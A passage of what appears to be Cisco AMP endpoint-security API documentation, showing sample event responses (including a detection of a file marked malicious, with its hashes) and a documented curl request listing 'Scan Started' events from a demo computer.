"ip": "237.160.117.93",
"mac": "b9:f4:70:d0:30:68"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/d06e9b84-7ce3-42a2-bc1c-2480fa1c81ca/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
}
},
"file": {
"disposition": "Malicious",
"file_name": "ekjrngjker.exe",
"file_path": "C:\\ekjrngjker.exe",
"identity": {
"sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
"sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
"md5": "b99e0a8c56f963246b6464b9fffbf7a2"
}
},
"tactics": [
"TA0042"
],
"techniques": [
"T1204.003"
]
}
]
}
Fetch list of events filtered by SCAN_STARTED event type
Request
Requires AuthorizationGET /v0/events?event_type%5B%5D=554696714&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED
cURL Edit, then copy and paste on your terminal
curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=554696714&limit=10'
Response
cURL Edit, then copy and paste on your terminal
curl -X GET \ -H 'accept: application/json' \ -H 'content-type: application/json' \ -H 'accept-encoding: identity' \ --compressed -H 'Accept-Encoding: gzip, deflate' \ -u YOUR_API_CLIENT_ID \ 'https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=554696714&limit=10'
Shortened for readability
content-type: application/json transfer-encoding: chunked status: 200 OK x-ratelimit-limit: 3000 x-ratelimit-reset: 881 strict-transport-security: max-age=31536000; includeSubDomains, max-age=31536000 referrer-policy: strict-origin-when-cross-origin x-ratelimit-remaining: 2818 x-permitted-cross-domain-policies: none x-download-options: noopen etag: W/"b56febc4957bc8a938e00d78749ea321" x-frame-options: SAMEORIGIN x-ratelimit-resetdate: 2022-03-18T11:55:11Z
{
"version": "v0.2.2",
"metadata": {
"links": {
"self": "https://api.consumer.amp.cisco.com/v0/events?event_type%5B%5D=554696714&limit=10"
},
"results": {
"total": 10,
"current_item_count": 10,
"index": 0,
"items_per_page": 10
}
},
"data": [
{
"id": 5832364858376454000,
"timestamp": 1647598024,
"timestamp_nanoseconds": 772000000,
"date": "2022-03-18T10:07:04+00:00",
"event_type": "Scan Started",
"event_type_id": 554696714,
"connector_guid": "8571ee01-fecb-4472-b583-27a9b3a8751f",
"group_guids": [
"af1e7d79-880b-4aaf-84d4-06149fef0cd2",
"8f6c4774-0e8e-4546-8ebd-4e1b035473b4"
],
"computer": {
"connector_guid": "8571ee01-fecb-4472-b583-27a9b3a8751f",
"hostname": "Demo_ZAccess",
"external_ip": "142.204.149.196",
"active": true,
"network_addresses": [
{
"ip": "236.208.251.95",
"mac": "6c:0d:af:5b:90:51"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/8571ee01-fecb-4472-b583-27a9b3a8751f",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/8571ee01-fecb-4472-b583-27a9b3a8751f/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"scan": {
"description": "C:\\Program Files\\DVD Maker"
}
},
{
"id": 5832364789656977000,
"timestamp": 1647598008,
"timestamp_nanoseconds": 193000000,
"date": "2022-03-18T10:06:48+00:00",
"event_type": "Scan Started",
"event_type_id": 554696714,
"connector_guid": "8571ee01-fecb-4472-b583-27a9b3a8751f",
"group_guids": [
"af1e7d79-880b-4aaf-84d4-06149fef0cd2",
"8f6c4774-0e8e-4546-8ebd-4e1b035473b4"
],
"computer": {
"connector_guid": "8571ee01-fecb-4472-b583-27a9b3a8751f",
"hostname": "Demo_ZAccess",
"external_ip": "142.204.149.196",
"active": true,
"network_addresses": [
{
"ip": "236.208.251.95",
"mac": "6c:0d:af:5b:90:51"
}
],
"links": {
"computer": "https://api.consumer.amp.cisco.com/v0/computers/8571ee01-fecb-4472-b583-27a9b3a8751f",
"trajectory": "https://api.consumer.amp.cisco.com/v0/computers/8571ee01-fecb-4472-b583-27a9b3a8751f/trajectory",
"group": "https://api.consumer.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
}
},
"scan": {
"description": "C:\\Program Files\\Microsoft Games"
}
}
]
}